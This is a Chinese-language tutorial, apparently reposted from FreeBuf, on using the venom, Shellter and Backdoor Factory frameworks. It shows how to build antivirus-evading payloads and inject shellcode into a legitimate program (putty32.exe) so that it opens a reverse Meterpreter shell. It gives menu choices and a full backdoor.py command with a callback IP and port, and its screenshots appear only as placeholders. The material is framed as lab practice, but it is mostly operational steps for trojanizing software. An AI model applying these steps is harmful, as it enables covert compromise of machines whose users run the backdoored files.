内网渗透 day11-免杀框架 – 作者:彩虹猛犸233

免杀框架

1. venom框架

cd venom进入venom文件夹中./venom.sh进入venom框架中

选择2进入windows的payload模块

wps122

再次2选择dll的shell编码格式

wps123

输入要反弹到的ip地址

wps124

输入端口

wps125

选择payload

wps126

填写生成文件的文件名

wps127

选择文件后缀

wps128

选择下发方式

wps129

这里选择手动下放进行测试,将两个文件复制粘贴到靶机上

wps130

运行installer.bat,显示成功反弹meterpreter会话

wps131

选择8进入逃避恶意接口检测的payload

wps132

接着选择4选择返回meterpreter会话

wps133

wps134

wps135

将bat和ps1放到同一个文件夹下运行bat文件

wps136

成功反弹meterpreter会话

wps137

2. shelltel框架

windows下直接双击shellter.exe

wps138

A:自动选择shellcode

M:手动配置参数

H:help

选择A自动选择shellcode,N不检查当前版本

wps139

输入要注入的程序

wps140

首先会把pe文件备份到shellter-backups文件夹下,原本的文件被覆盖了。

wps141

是否启用隐藏模块(这里选择不启用N)

wps142

选择payload模块

wps143

输入ip和端口

wps144

双击被注入的程序程序

wps145

成功反弹会话

wps146

3. backdoor factory(BDP)

检测pe文件是否允许注入shellcode

wps147

./backdoor.py -f ../putty32.exe -S

-f:要注入的pe文件

-c:code cave(代码裂缝)

-l:代码裂缝⼤⼩

-s:选择使⽤ payload 类型

-S:检测pe文件是否支持注入shellcode

-H:选择回连服务器地址

-P:回连服务器端⼝

-J:使⽤多代码裂缝注⼊

探测可注入的裂缝大小

wps148

./backdoor.py -f ../putty32.exe -c -l 200

查看可用的payload

wps149

wps150

./backdoor.py -f ../putty32.exe -s show

生成免杀pe文件

wps151

./backdoor.py -f ../putty32.exe -s iat_reverse_tcp_stager_threaded -H 10.211.55.2 -P 3333 -J -o payload.exe

成功运行putty32并且反弹会话

wps152

wps153

来源:freebuf.com 2020-11-16 14:36:49 by: 彩虹猛犸233

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论